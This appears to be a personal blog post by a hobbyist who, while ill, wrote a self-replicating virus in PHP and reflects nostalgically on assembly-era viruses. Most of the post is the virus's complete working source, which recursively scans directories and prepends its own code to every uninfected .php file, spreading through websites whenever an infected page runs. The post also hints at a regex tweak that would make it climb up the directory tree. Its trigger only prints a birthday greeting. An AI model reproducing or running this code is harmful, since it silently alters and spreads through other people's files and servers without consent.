I was sick (and bored) this week, and my brain didn’t want to do any work. I was laying in bed with a cold/flu virus, thinking about modern day computer viruses while shaking my head in disappointment (or virii for the 90’s hackers… hereinafter shall be referred to as “viruses” for everyone else’s sake). Computer viruses these days are a joke. They’re not very stealth, they don’t spread very far, and they can be removed far too easily. Once upon a time, viruses were a form of art… and they were ALL written in Assembly. Anything less (or shall I say more), was considered a joke. The traditional computer virus’ job was simple:

Search for infectable files.
Check for virus signature.
If it exists, it’s infected. Keep searching. If not, infect it using the bytes from one of the infected files.
Don’t bomb the computer until a trigger of some sort.. eg: a particular date.

And that’s all there is to it. Some consider computer viruses as the most primitive form of artificial intelligence because its primary function is to replicate itself or “spawn” just like any other life form. Since virus authors today like to write viruses in higher-level languages, I decided to write my own virus in a higher-level language… nevertheless, keeping the traditional methods of replication and bombing. I wrote it in PHP and I did this for fun. It took me no longer than the duration of 2 Twilight Zone (original series) episodes. It’s educational, but please take caution if you run it. It IS a working virus and it WILL recurse directories and infect other PHP files… which in turn will infect other PHP files. The “bomb” portion of the virus doesn’t do anything malicious… it just prints a “HAPPY BIRTHDAY CRANKY!” to the screen on my actual birthday. The interesting thing about writing a virus in PHP is that a) it can run on Windows, OS X, and *nix and b) once it infects a website, any php file that is run as a direct result of a user visiting your website will cause the virus to run and infect other php files and, if triggered on the correct day, say “HAPPY BIRTHDAY CRANKY!” on the said website… unless of course, it runs into file permission restrictions.

<?php
define("SIGNATURE", "CRANKY'S PHP VIRUS");
// determine whether backslash or forward slashes are used
define("SLASH", stristr($_SERVER['PWD'], "/") ? "/" : "\\");
$linenumber = __LINE__;
define("STARTLINE",$linenumber-4);
define("ENDLINE",$linenumber+45);
function search($path){
    $ret = "";
    $fp = opendir($path);
    while($f = readdir($fp)){
        if( preg_match("#^\.+$#", $f) ) continue; // ignore symbolic links
        $file_full_path = $path.SLASH.$f;
        if(is_dir($file_full_path)) { // if it's a directory, recurse
            $ret .= search($file_full_path);
        } else if( !stristr(file_get_contents($file_full_path), SIGNATURE) ) { // search for uninfected files to infect
            $ret .= $file_full_path."\n";
        }   
    }   
    return $ret;
}
function infect($filestoinfect){
    $handle = @fopen(__FILE__, "r");
    $counter = 1;
    $virusstring = ""; 
    while(($buffer=fgets($handle,4096)) !== false){
        if($counter>=STARTLINE && $counter<=ENDLINE){
            $virusstring .= $buffer;
        }   
        $counter++;
    }   
    fclose($handle);
    $filesarray = array();
    $filesarray = explode("\n",$filestoinfect);
    foreach($filesarray AS $v){
        if(substr($v,-4)===".php"){
            $filecontents = file_get_contents($v);
            file_put_contents($v,$virusstring.$filecontents);
        }
    }
}
function bomb(){
    if(date("md") == 0125){
        echo "HAPPY BIRTHDAY CRANKY!";
    }
}
$filestoinfect = search(__DIR__);
infect($filestoinfect);
bomb();
?>

You can also download the source code here.

To test it out, I wrote a bunch of short and simple php files and placed it in the same folder. Then I made a subfolder and put some php files in there. Then I made a subsubfolder and put some php files in there as well. I ran the virus and what do you know? It infected ALL the php files. By changing a couple characters in the regex, I can make this recurse up the directory structure as well… but I didn’t. Enjoy, be safe, and don’t be a malicious script kiddy.